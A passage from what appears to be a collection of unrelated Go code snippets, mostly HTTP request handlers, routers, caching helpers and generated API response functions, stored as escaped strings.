respmod\\n\", req.Method)\n\t}\n}", "func (r *bitroute) GET(path string, f func(router.Control)) {\n\tr.register(\"GET\", path, f)\n}", "func (tr *Transport) GET(\n\turi string,\n\tfn Handler,\n\toptions ...HandlerOption,\n) {\n\ttr.mux.Handler(\n\t\tnet_http.MethodGet,\n\t\turi,\n\t\tnewHandler(fn, append(tr.options, options...)...),\n\t)\n}", "func checkUrl(writer http.ResponseWriter, request *http.Request) {\n\tvars := mux.Vars(request)\n\thostname := vars[\"hostname\"]\n\tquerypath := vars[\"querypath\"]\n\n\tresponse := APIResponse{}\n\terr := utils.ValidateUrl(hostname)\n\tif err != nil {\n\t\tresponse.BadRequest(err)\n\t\thttp_respond(response, writer)\n\t\treturn\n\t}\n\n\tdecodedPath, err := utils.URLDecode(querypath)\n\tif err != nil {\n\t\tresponse.BadRequest(err)\n\t\thttp_respond(response, writer)\n\t\treturn\n\t}\n\n\t// Generate URL service for querying the URL\n\turlService, err := services.NewUrlService(hostname, decodedPath, config.DBType, config.CacheType)\n\n\tif err != nil {\n\t\tutils.LogError(utils.LogFields{\"hostname\": hostname, \"path\": decodedPath}, err, \"Error getting URL\")\n\t\tresponse.InternalError(errors.New(\"An error occurred\"))\n\t\thttp_respond(response, writer)\n\t\treturn\n\t}\n\n\turlStatus, err := urlService.FindUrl()\n\tif err != nil {\n\t\tutils.LogError(utils.LogFields{\"hostname\": hostname, \"path\": decodedPath}, err, \"Error getting URL\")\n\t\tresponse.InternalError(errors.New(\"An error occurred\"))\n\t} else {\n\t\tresponse.Success(urlStatus)\n\t}\n\n\thttp_respond(response, writer)\n}", "func NSSAIAvailabilityUnsubscribe(httpChannel chan nssf_message.HttpResponseMessage, c *gin.Context) {\n\n flog.Nssaiavailability.Infof(\"Request received - NSSAIAvailabilityUnsubscribe\")\n\n var (\n subscriptionId string\n status int\n d ProblemDetails\n )\n\n // Parse subscriptionId from URL path\n subscriptionId = c.Param(\"subscriptionId\")\n\n status = subscriptionDelete(subscriptionId, &d)\n\n // Set response\n switch status {\n case http.StatusNoContent:\n var arg interface{}\n nssf_message.SendHttpResponseMessage(httpChannel, nssf_message.HttpResponseMessageResponse, arg)\n flog.Nssaiavailability.Infof(\"Response code 204 No Content\")\n case http.StatusNotFound:\n nssf_message.SendHttpResponseMessage(httpChannel, nssf_message.HttpResponseMessageProblemDetails, d)\n flog.Nssaiavailability.Infof(d.Detail)\n flog.Nssaiavailability.Infof(\"Response code 404 Not Found\")\n default:\n flog.Nssaiavailability.Warnf(\"Unknown reponse code\")\n }\n}", "func wrappedHandler(h http.Handler) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tgg, ok := r.URL.Query()[\"go-get\"]\n\t\tif ok && len(gg) == 1 && gg[0] == \"1\" {\n\t\t\t// Serve a trivial html page.\n\t\t\tw.Write([]byte(goGetHTML5))\n\t\t\treturn\n\t\t}\n\t\t// Fallthrough.\n\t\th.ServeHTTP(w, r)\n\t})\n}", "func doGetFallback(\n\tctx context.Context,\n\tclient promapi.Client,\n\tu *url.URL,\n\targs url.Values,\n\tcache bool,\n) (*http.Response, []byte, promapiv1.Warnings, error) { //nolint:unparam\n\treq, err := http.NewRequest(http.MethodPost, u.String(), strings.NewReader(args.Encode()))\n\tif err != nil {\n\t\treturn nil, nil, nil, err\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n\tif !cache {\n\t\treq.Header.Set(\"Cache-Control\", \"no-store\")\n\t}\n\n\tresp, data, warnings, err := do(ctx, client, req)\n\n\tif resp != nil && resp.StatusCode == http.StatusMethodNotAllowed {\n\t\tu.RawQuery = args.Encode()\n\t\treq, err = http.NewRequest(http.MethodGet, u.String(), nil)\n\n\t\tif err != nil {\n\t\t\treturn nil, nil, warnings, err\n\t\t}\n\n\t\tif !cache {\n\t\t\treq.Header.Set(\"Cache-Control\", \"no-store\")\n\t\t}\n\n\t\treturn do(ctx, client, req)\n\t}\n\n\treturn resp, data, warnings, err\n}", "func (w *worker) requestURL(ctx *URLContext, headRequest bool) {\n\tif res, ok := w.fetchURL(ctx, w.opts.UserAgent, headRequest); ok {\n\t\tvar harvested interface{}\n\t\tvar visited bool\n\n\t\t// Close the body on function end\n\t\tdefer res.Body.Close()\n\n\t\t// Any 2xx status code is good to go\n\t\tif res.StatusCode >= 200 && res.StatusCode < 300 {\n\t\t\t// Success, visit the URL\n\t\t\tharvested = w.visitURL(ctx, res)\n\t\t\tvisited = true\n\t\t} else {\n\t\t\t// Error based on status code received\n\t\t\tw.opts.Extender.Error(newCrawlErrorMessage(ctx, res.Status, CekHttpStatusCode))\n\t\t\tw.logFunc(LogError, \"ERROR status code for %s: %s\", ctx.url, res.Status)\n\t\t}\n\t\tw.sendResponse(ctx, visited, harvested, false)\n\t}\n}", "func (cr CustmoRouter) GETC(relativePath string,tailHandler adapter.RequestHandler, frontHandlers ...gin.HandlerFunc) gin.IRoutes {\n\tif tailHandler == nil {\n\t\treturn cr.GET(relativePath, frontHandlers...)\n\t} else {\n\t\tfrontHandlers = append(frontHandlers, adapter.ErrorAdapter(tailHandler))\n\t\treturn cr.GET(relativePath, frontHandlers...)\n\t}\n}", "func WrapResponse(w http.ResponseWriter, request types.InterxRequest, response types.ProxyResponse, statusCode int, saveToCache bool) {\n\tif statusCode == 0 {\n\t\tstatusCode = 503 // Service Unavailable Error\n\t}\n\tif saveToCache {\n\t\t// GetLogger().Info(\"[gateway] Saving in the cache\")\n\n\t\tchainIDHash := GetBlake2bHash(response.Chainid)\n\t\tendpointHash := GetBlake2bHash(request.Endpoint)\n\t\trequestHash := GetBlake2bHash(request)\n\t\tif conf, ok := RPCMethods[request.Method][request.Endpoint]; ok {\n\t\t\terr := PutCache(chainIDHash, endpointHash, requestHash, types.InterxResponse{\n\t\t\t\tResponse: response,\n\t\t\t\tStatus: statusCode,\n\t\t\t\tExpireAt: time.Now().Add(time.Duration(conf.CachingDuration) * time.Second),\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\t// GetLogger().Error(\"[gateway] Failed to save in the cache: \", err.Error())\n\t\t\t}\n\t\t\t// GetLogger().Info(\"[gateway] Save finished\")\n\t\t}\n\t}\n\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tw.Header().Add(\"Interx_chain_id\", response.Chainid)\n\tw.Header().Add(\"Interx_block\", strconv.FormatInt(response.Block, 10))\n\tw.Header().Add(\"Interx_blocktime\", response.Blocktime)\n\tw.Header().Add(\"Interx_timestamp\", strconv.FormatInt(response.Timestamp, 10))\n\tw.Header().Add(\"Interx_request_hash\", response.RequestHash)\n\tif request.Endpoint == config.QueryDataReference {\n\t\treference, err := database.GetReference(string(request.Params))\n\t\tif err == nil {\n\t\t\tw.Header().Add(\"Interx_ref\", \"/download/\"+reference.FilePath)\n\t\t}\n\t}\n\n\tif response.Response != nil {\n\t\tresponse.Signature, response.Hash = GetResponseSignature(response)\n\n\t\tw.Header().Add(\"Interx_signature\", response.Signature)\n\t\tw.Header().Add(\"Interx_hash\", response.Hash)\n\t\tw.WriteHeader(statusCode)\n\n\t\tjson.NewEncoder(w).Encode(response.Response)\n\t} else {\n\t\tw.WriteHeader(statusCode)\n\n\t\tif response.Error == nil {\n\t\t\tresponse.Error = \"service not available\"\n\t\t}\n\t\tjson.NewEncoder(w).Encode(response.Error)\n\t}\n}", "func baseGetHandler(\n\thander apiGetAction,\n\tconfig Configuration,\n\tlogging logging.Logging,\n\tmeasurement Measurement) http.HandlerFunc {\n\treturn func(writer http.ResponseWriter, request *http.Request) {\n\n\t\tif request.Method == \"GET\" {\n\t\t\tstart := time.Now()\n\t\t\terr := hander(writer, request.URL.Query(), logging)\n\t\t\tmeasurement.Log(request.URL.Path, time.Since(start).Nanoseconds()/1000000)\n\n\t\t\tif config.errorPkgHandle(err, writer, logging) {\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\thttp.Error(writer, \"Unsupported HTTP method\", 422)\n\t\t}\n\t}\n}", "func handlerICon(w http.ResponseWriter, r *http.Request) {}", "func (client MultipleResponsesClient) GetDefaultNone200InvalidResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func IsGET(r *http.Request) bool {\n\treturn strings.Compare(r.Method, \"GET\") == 0\n}", "func registerUriPathObserve(responses interface{}, request *libcoap.Pdu, observe int, isTelemetryRequest bool) {\n query := \"\"\n requestQueries := request.Queries()\n if len(requestQueries) > 0 {\n for _, v := range requestQueries {\n if query != \"\"{\n query += \"&\"\n query += v\n } else {\n query += \"?\"\n query += v\n }\n }\n }\n requestPath := request.PathString()\n requestPathSplit := strings.Split(requestPath, \"/mid\")\n if len(requestPathSplit) <= 1 {\n requestPathSplit = strings.Split(requestPath, \"/tmid\")\n }\n if observe == int(messages.Register) {\n if len(requestPathSplit) > 1 && query != \"\" {\n uriPath := requestPath + query\n libcoap.SetUriFilter(requestPath, uriPath)\n } else if len(requestPathSplit) <= 1 && !isTelemetryRequest {\n resList := responses.([]messages.ScopeStatus)\n for _, res := range resList {\n uriPath := requestPath+\"/mid=\"+strconv.Itoa(res.MitigationId)+query\n libcoap.SetUriFilter(requestPath, uriPath)\n }\n } else if len(requestPathSplit) <= 1 && isTelemetryRequest {\n resList := responses.([]messages.PreOrOngoingMitigationResponse)\n for _, res := range resList {\n uriPath := requestPath+\"/tmid=\"+strconv.Itoa(res.Tmid)+query\n libcoap.SetUriFilter(requestPath, uriPath)\n }\n } else {\n // TODO\n libcoap.DeleteUriFilterByKey(requestPath)\n }\n }\n}", "func handle_uri_satellites(w http.ResponseWriter, r *http.Request) {\n\n\tif logutil.GPS_DEBUG > 0 {\n\t\t// Log the request before handling it\n\t\tlogutil.LogRestRequest(r.Method, r.URL.Path)\n\t}\n\n\t// Accept only GET requests to this URI\n\tif r.Method != \"GET\" {\n\t\trespond_with_error(w, http.StatusMethodNotAllowed, r.Method, r.URL.Path)\n\t\treturn\n\t}\n\n\t// Add the standard JSON header to the response\n\t// add_json_header(w) // respond_with_success does this\n\n\t// Prevent this data from being cached (client must always revalidate)\n\tadd_no_cache_header(w)\n\n\t// Construct the JSON response string\n\tresponse_string := string(cache.GetSatellitesAsJSON())\n\n\t// Send the response (and log it)\n\trespond_with_success(w, http.StatusOK, response_string)\n}", "func handleRequestAndRedirect(res http.ResponseWriter, req *http.Request) {\n\tpath := strings.ToLower(req.URL.Path)\n\tif strings.Compare(path, \"/aggregated/caseworkers/:uid/jurisdictions\") == 0 {\n\t\tfirst := fetchJsonArray(CcdHost, req)\n\t\tsecond := fetchJsonArray(IndependentHost, req)\n\t\tresult := append(first, second...)\n\t\tjson.NewEncoder(res).Encode(result)\n\t\treturn\n\t}\n\n\tif strings.Compare(path, \"/health\") == 0 {\n\t\tfmt.Fprintf(res, \"OK\")\n\t\treturn\n\t}\n\n\tif isIndie(req.URL) {\n\t\tserveReverseProxy(\"http://\" + IndependentHost, res, req)\n\t\treturn\n\t}\n\n\tserveReverseProxy(\"http://\" + CcdHost, res, req)\n}", "func (ex *ExchangeClient) doRequestResponse(responseCh chan *http.Response, errCh chan error) {\n\tex.Debug(\"Starting doRequestResponse\")\n\tdefer Utils.RecoverCrash(ex.logger)\n\tex.mutex.Lock() // prevents the longpoll from cancelling the request while we're still setting it up.\n\tunlockMutex := true\n\tdefer func() {\n\t\tex.Debug(\"Exiting doRequestResponse\")\n\t\tex.wg.Done()\n\t\tif unlockMutex {\n\t\t\tex.mutex.Unlock()\n\t\t}\n\t}()\n\n\tvar err error\n\tif ex == nil || ex.pi == nil {\n\t\tif ex.logger != nil {\n\t\t\tex.Warning(\"doRequestResponse called but structures cleaned up\")\n\t\t}\n\t\treturn\n\t}\n\tif ex.request != nil {\n\t\tex.Error(\"Doing doRequestResponse with an active request in process!!\")\n\t\treturn\n\t}\n\trequestBody := bytes.NewReader(ex.pi.RequestData)\n\tex.Debug(\"request WBXML %s\", base64.StdEncoding.EncodeToString(ex.pi.RequestData))\n\treq, err := http.NewRequest(\"POST\", ex.pi.MailServerUrl, requestBody)\n\tif err != nil {\n\t\terrCh <- fmt.Errorf(\"Failed to create request: %s\", err.Error())\n\t\treturn\n\t}\n\tfor k, v := range ex.pi.HttpHeaders {\n\t\tif k == \"Accept-Encoding\" {\n\t\t\t// ignore this. It could mess us up.\n\t\t\tcontinue\n\t\t}\n\t\treq.Header.Add(k, v)\n\t}\n\tif header := req.Header.Get(\"Accept\"); header == \"\" {\n\t\treq.Header.Add(\"Accept\", \"*/*\")\n\t}\n\tif header := req.Header.Get(\"Accept-Language\"); header == \"\" {\n\t\treq.Header.Add(\"Accept-Language\", \"en-us\")\n\t}\n\tif header := req.Header.Get(\"Connection\"); header == \"\" {\n\t\treq.Header.Add(\"Connection\", \"keep-alive\")\n\t}\n\n\treq.Proto = \"HTTP/1.1\"\n\treq.ProtoMajor = 1\n\treq.ProtoMinor = 1\n\n\tif ex.pi.MailServerCredentials.Username != \"\" && ex.pi.MailServerCredentials.Password != \"\" {\n\t\treq.SetBasicAuth(ex.pi.MailServerCredentials.Username, ex.pi.MailServerCredentials.Password)\n\t}\n\tex.request = req // save it so we can cancel it in another routine\n\tex.mutex.Unlock()\n\tunlockMutex = false\n\n\tex.Debug(\"Making Connection to server\")\n\t// Make the request and wait for response; this could take a while\n\t// TODO Can we and how do we validate the server certificate?\n\t// TODO Can we guard against bogus SSL negotiation from a hacked server?\n\t// TODO Perhaps we need to read and assess the Go SSL/TLS implementation\n\tresponse, err := ex.httpClient.Do(ex.request)\n\tex.request = nil // unsave it. We're done with it.\n\tif ex.cancelled == true {\n\t\tex.Debug(\"Exchange Request cancelled. Exiting|msgCode=EAS_REQ_CANCELLED\")\n\t\treturn\n\t}\n\tif err != nil {\n\t\t// if we cancel requests, we drop into this error case. We will wind up sending\n\t\t// the retryResponse, but since no one is listening, we don't care (there's no\n\t\t// memory leakage in this case\n\t\t// TODO Can 'err.Error()' be data from the remote endpoint? Do we need to protect against it?\n\t\t// TODO Perhaps limit the length we log here.\n\t\tredactedError := RedactEmailFromError(err.Error())\n\t\tif strings.Contains(redactedError, \"no such host\") == true {\n\t\t\tex.Warning(redactedError)\n\t\t\terrCh <- NoSuchHostError\n\t\t\treturn\n\t\t} else if strings.Contains(redactedError, \"certificate signed by unknown authority\") {\n\t\t\tex.Error(redactedError)\n\t\t\terrCh <- UnknownCertificateAuthority\n\t\t\treturn\n\t\t} else {\n\t\t\tex.Info(\"Post failed: %s. Will retry\", redactedError)\n\t\t}\n\t\tresponseCh <- retryResponse\n\t\treturn\n\t}\n\n\t// read at most ex.maxResponseSize() bytes. We do this so that an attacker can't\n\t// flood us with an infinite amount of data. Note we also do not (and SHOULD not)\n\t// pay any attention to the Content-Length header. An attacker could screw us up\n\t// with a wrong one.\n\tvar responseBytes []byte\n\tvar toRead int\n\tif response.StatusCode != 200 {\n\t\ttoRead = 1024 // read any odd responses up to 1k, so we can adequately debug-log them.\n\t} else {\n\t\ttoRead = ex.maxResponseSize()\n\t}\n\tresponseBytes = make([]byte, toRead)\n\tif len(responseBytes) != toRead {\n\t\tex.Error(\"len of response is not what we expected\")\n\t\treturn\n\t}\n\t// TODO Do I need to loop here to make sure I get the number of bytes I expect? i.e. like unix sockets returning less than you expected.\n\tn, err := response.Body.Read(responseBytes)\n\tif err != nil {\n\t\tif err != io.EOF {\n\t\t\tex.Error(\"Failed to read response: %s\", err.Error())\n\t\t\tresponseCh <- retryResponse\n\t\t\treturn\n\t\t} else if n == 0 {\n\t\t\tif ex.pi.ASIsSyncRequest == true {\n\t\t\t\tex.Debug(\"Empty response. No change\")\n\t\t\t\tresponseCh <- response\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tex.Debug(\"EOF from body read\")\n\t\t\t\tresponseCh <- retryResponse\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\t// If EAS Ping\n\tif ex.pi.ASIsSyncRequest == false && n < toRead && n != len(ex.pi.ExpectedReply) && n != len(ex.pi.NoChangeReply) {\n\t\tex.Warning(\"Read less than expected: %d < %d\", n, toRead)\n\t}\n\n\t// Then close the connection. We do this just for 'cleanliness'. If we forget,\n\t// then keepalives won't work (not that we need them).\n\tresponse.Body.Close()\n\n\t// Now put the 'body' back onto the response for later processing (because we return a response object,\n\t// and the LongPoll loop wants to read it and the headers.\n\tcached_data := ioutil.NopCloser(bytes.NewReader(responseBytes))\n\tresponse.Body = cached_data\n\n\tex.Debug(\"reply WBXML %s\", base64.StdEncoding.EncodeToString(responseBytes[:n]))\n\n\tif globals.config.DumpRequests || response.StatusCode >= 500 {\n\t\theaderBytes, _ := httputil.DumpResponse(response, false)\n\t\tif err != nil {\n\t\t\tex.Error(\"Could not dump response %+v\", response)\n\t\t} else {\n\t\t\tex.Debug(\"response:\\n%s%s\", headerBytes, responseBytes)\n\t\t}\n\t}\n\tresponseCh <- response\n}", "func notFound(rw http.ResponseWriter, r *http.Request) {\n\n}", "func (client PrimitiveClient) GetStringResponder(resp *http.Response) (result StringWrapper, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByUnmarshallingJSON(&result),\n autorest.ByClosing())\n result.Response = autorest.Response{Response: resp}\n return\n}", "func (h *handler) GetURL(response http.ResponseWriter, request *http.Request) {\n\tvars := mux.Vars(request)\n\tpath := vars[\"path\"]\n\n\tlog.Infof(\"Request to obtain URL associated with path '%s'\", path)\n\n\tif dest, ok := h.store.Get(path); ok {\n\t\tencoder := json.NewEncoder(response)\n\t\tencoder.Encode(urlMapping{path, dest})\n\t\treturn\n\t}\n\n\thttp.NotFound(response, request)\n}", "func handleHttpEndpoint(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Add(\"Content-Type\", \"text/plain\")\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, \"## Server Information\\n\\n\")\n\n\t// Hostname\n\thost, err := os.Hostname()\n\tif err == nil {\n\t\tfmt.Fprintf(w, \"Hostname: %s\\n\", host)\n\t} else {\n\t\tfmt.Fprintf(w, \"Hostname: %s\\n\", err.Error())\n\t}\n\n\t// Environment Variables\n\tallowShowEnvStr := os.Getenv(\"ALLOW_SHOW_ENV\")\n\tallowShowEnv, err := strconv.ParseBool(allowShowEnvStr)\n\trequestShowEnv := r.URL.Query().Get(\"show_env\")\n\trequestShowK8s := r.URL.Query().Get(\"show_k8s\")\n\n\tif len(requestShowK8s) != 0 {\n\t\tfmt.Fprint(w, \"\\n## Kubernetes Environment\\n\\n\")\n\t\t// Loop through K8S Variables\n\t\tfor _, e := range os.Environ() {\n\t\t\tif strings.HasPrefix(e, \"K8S\") {\n\t\t\t\tfmt.Fprintf(w, \"%s\\n\", e)\n\t\t\t}\n\t\t}\n\t}\n\n\tif err == nil && allowShowEnv && len(requestShowEnv) != 0 {\n\t\tfmt.Fprint(w, \"\\n## Server Environment\\n\\n\")\n\t\t// Loop through Environment Variables\n\t\tfor _, e := range os.Environ() {\n\t\t\tfmt.Fprintf(w, \"%s\\n\", e)\n\t\t}\n\t}\n\n\t// Client Info\n\tfmt.Fprintf(w, \"\\n## Client Information:\\n\\n\")\n\tfmt.Fprintf(w, \"Client: %s\\n\", r.RemoteAddr)\n\n\t// Request Info\n\tfmt.Fprintf(w, \"\\n## Request Information:\\n\\n\")\n\tfmt.Fprintf(w, \"%s\\n\", formatRequestInfo(r))\n\n}", "func getNoBody(urlStr string) (*Response, error) {\n\tres, err := cli.Get(urlStr)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tres.CloseBody()\n\treturn res, nil\n}", "func processRequestCache(w http.ResponseWriter, req *http.Request) {\n\n\t//Get the headers map\n\theaderMap := w.Header()\n\n\tparameter := req.URL.Query()[\"seconds\"]\n\tif parameter != nil {\n\t\tseconds := req.URL.Query()[\"seconds\"][0]\n\n\t\tif seconds != \"\" {\n\t\t\theaderMap.Add(\"Cache-Control\", \"max-age=\"+seconds)\n\t\t}\n\t}\n\n\t//Copy headers sent to the response\n\tif req.Header[\"Error\"] != nil {\n\t\tw.WriteHeader(500)\n\t\tw.Write([]byte(\"{\\\"error\\\":\\\"Error getting resource\\\"}\"))\n\t} else {\n\t\tw.WriteHeader(200)\n\t\tw.Write([]byte(\"{\\\"id\\\":\\\"MLA\\\"}\"))\n\t}\n\n\treturn\n\n}", "func (hu *httpUsecase) get(url string) (*models.Response, error) {\n\tresponse := &models.Response{}\n\n\t// Lookup in cache\n\tkey := fmt.Sprintf(\"%s:%s\", coreModels.UpstreamStoreKeyPrefix, url)\n\tif err := hu.store.Get(key, response); err == nil {\n\t\t// Cache found, return\n\t\treturn response, nil\n\t}\n\n\t// Download page\n\tresponse, err := hu.repository.Get(url)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Adding result in store\n\t_ = hu.store.Set(key, *response, time.Millisecond*time.Duration(hu.cacheExpiration))\n\n\treturn response, nil\n}", "func (client MultipleResponsesClient) Get202None204NoneDefaultNone400InvalidResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (_obj *LacService) Dispatch(ctx context.Context, _val interface{}, req *requestf.RequestPacket, resp *requestf.ResponsePacket, withContext bool) (err error) {\n\t_is := codec.NewReader(tools.Int8ToByte(req.SBuffer))\n\t_os := codec.NewBuffer()\n\tswitch req.SFuncName {\n\tcase \"test\":\n\t\terr := test(ctx, _val, _os, _is, withContext)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\tcase \"lacTag\":\n\t\terr := lacTag(ctx, _val, _os, _is, withContext)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\tdefault:\n\t\treturn fmt.Errorf(\"func mismatch\")\n\t}\n\tvar _status map[string]string\n\ts, ok := current.GetResponseStatus(ctx)\n\tif ok && s != nil {\n\t\t_status = s\n\t}\n\tvar _context map[string]string\n\tc, ok := current.GetResponseContext(ctx)\n\tif ok && c != nil {\n\t\t_context = c\n\t}\n\t*resp = requestf.ResponsePacket{\n\t\tIVersion: 1,\n\t\tCPacketType: 0,\n\t\tIRequestId: req.IRequestId,\n\t\tIMessageType: 0,\n\t\tIRet: 0,\n\t\tSBuffer: tools.ByteToInt8(_os.ToBytes()),\n\t\tStatus: _status,\n\t\tSResultDesc: \"\",\n\t\tContext: _context,\n\t}\n\treturn nil\n}", "func (client MultipleResponsesClient) GetDefaultNone200NoneResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (client PrimitiveClient) GetDoubleResponder(resp *http.Response) (result DoubleWrapper, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByUnmarshallingJSON(&result),\n autorest.ByClosing())\n result.Response = autorest.Response{Response: resp}\n return\n}", "func process(w http.ResponseWriter, r *http.Request, connectionType string) {\n\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Content-type\", \"text/plain\")\n\n\tvar macAddress string\n\tvar response string\n\n\tclientIP, _, netSplitErr := net.SplitHostPort(r.RemoteAddr)\n\n\tif netSplitErr != nil {\n\n\t\tlogger.Error(netSplitErr.Error())\n\t\thttp.Error(w, \"Invalid host IP/PORT\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif r.Method == \"GET\" {\n\t\tmacAddress = r.URL.Path[1:]\n\t} else {\n\t\thttp.Error(w, r.Method+\" requests not accepted\", http.StatusMethodNotAllowed)\n\t\treturn\n\t}\n\n\tif macAddress == \"\" {\n\t\thttp.Error(w, \"No MAC address provided\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tcleanedMacAddress := cleanMacAddress(macAddress)\n\tcleanedAddressLength := len(cleanedMacAddress)\n\n\tvar vendor string\n\n\taddressMap.RLock()\n\tdefer addressMap.RUnlock()\n\n\tif cleanedAddressLength >= 9 {\n\t\t// Check for MA-S match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:9]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor == \"\" && cleanedAddressLength >= 7 {\n\t\t// Check for MA-M match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:7]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor == \"\" && cleanedAddressLength >= 6 {\n\t\t// Check for MA-L match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:6]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor != \"\" {\n\t\tio.WriteString(w, vendor)\n\t\tresponse = vendor\n\t} else {\n\t\thttp.Error(w, \"Vendor not found\", http.StatusNotFound)\n\t\tresponse = \"Not Found\"\n\t}\n\n\tlogger.Info(\n\t\t\"api request\",\n\t\tzap.String(\"clientIp\", clientIP),\n\t\tzap.String(\"connectionType\", connectionType),\n\t\tzap.String(\"method\", r.Method),\n\t\tzap.String(\"macAddress\", cleanedMacAddress),\n\t\tzap.String(\"response\", response),\n\t)\n\n}", "func (client MultipleResponsesClient) Get200ModelA200NoneResponder(resp *http.Response) (result A, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByUnmarshallingJSON(&result),\n autorest.ByClosing())\n result.Response = autorest.Response{Response: resp}\n return\n}", "func handle_uri_gps(w http.ResponseWriter, r *http.Request) {\n\n\tif logutil.GPS_DEBUG > 0 {\n\t\t// Log the request before handling it\n\t\tlogutil.LogRestRequest(r.Method, r.URL.Path)\n\t}\n\n\t// Accept only GET requests to this URI\n\tif r.Method != \"GET\" {\n\t\trespond_with_error(w, http.StatusMethodNotAllowed, r.Method, r.URL.Path)\n\t\treturn\n\t}\n\n\t// Add the standard JSON header to the response\n\t// add_json_header(w) // respond_with_success does this\n\n\t// Prevent this data from being cached (client must always revalidate)\n\tadd_no_cache_header(w)\n\n\t// Construct the JSON response string\n\tresponse_string := string(cache.GetAsJSON())\n\n\t// Send the response (and log it)\n\trespond_with_success(w, http.StatusOK, response_string)\n}", "func checkQueryStringHandler(w ResponseWriter, r *Request) {\n\tu := *r.URL\n\tu.Scheme = HTTP\n\tu.Host = r.Host\n\tu.RawQuery = \"\"\n\tif HttpUrlPrefix+r.URL.RawQuery == u.String() {\n\t\tw.WriteHeader(200)\n\t} else {\n\t\tw.WriteHeader(500)\n\t}\n}", "func U2(w http.ResponseWriter) (err error) {\n\treturn Fail(w, 404, map[string]string{\"generic\": \"resource not found\"})\n}", "func (Executor) ServeHTTP(w http.ResponseWriter, req *http.Request) {\n\tlogger.Logging(logger.DEBUG, \"receive msg\", req.Method, req.URL.Path)\n\tdefer logger.Logging(logger.DEBUG, \"OUT\")\n\n\tswitch reqUrl := req.URL.Path; {\n\tdefault:\n\t\tlogger.Logging(logger.DEBUG, \"Unknown URL\")\n\t\tcommon.MakeErrorResponse(w, errors.NotFoundURL{reqUrl})\n\n\tcase !(strings.Contains(reqUrl, (url.Base()+url.Management())) ||\n\t\tstrings.Contains(reqUrl, (url.Base()+url.Monitoring())) ||\n\t\tstrings.Contains(reqUrl, (url.Base()+url.Notification()))):\n\t\tlogger.Logging(logger.DEBUG, \"Unknown URL\")\n\t\tcommon.MakeErrorResponse(w, errors.NotFoundURL{reqUrl})\n\n\tcase strings.Contains(reqUrl, url.Unregister()):\n\t\thealthAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Management()) &&\n\t\tstrings.Contains(reqUrl, url.Apps()):\n\t\tdeploymentAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Resource()):\n\t\tresourceAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Configuration()):\n\t\tconfigurationAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Device()):\n\t\tdeviceAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Notification()):\n\t\tnotificationAPIExecutor.Handle(w, req)\n\t}\n}", "func (downloader *DatabaseDownloader) doGETRequest(urlString string) (*http.Response, error) {\n\n\tparsedURL, err := url.Parse(urlString)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tq := parsedURL.Query()\n\tq.Set(\"edition_id\", \"GeoLite2-City\")\n\tq.Set(\"license_key\", downloader.LicenseKey)\n\tparsedURL.RawQuery = q.Encode()\n\n\treq, err := http.NewRequest(\"GET\", parsedURL.String(), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Set(\"Content-Encoding\", \"\")\n\treq.Header.Set(\"Connection\", \"close\")\n\treq.Header.Set(\"Accept-Encoding\", \"deflate, identity\")\n\n\tresp, err := downloader.httpClient.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif resp.StatusCode == 401 {\n\t\treturn nil, errors.New(\"Invalid license key\")\n\t}\n\n\treturn resp, nil\n\n}", "func OpenAPIAdapterHandler(w http.ResponseWriter, r *http.Request) {\n\terr := r.ParseForm()\n\tif err != nil {\n\t\tcustomError(w, \"request body format error: \"+err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tuserID := r.FormValue(\"userid\")\n\tappID := r.FormValue(\"appid\")\n\n\tuserIP, err := 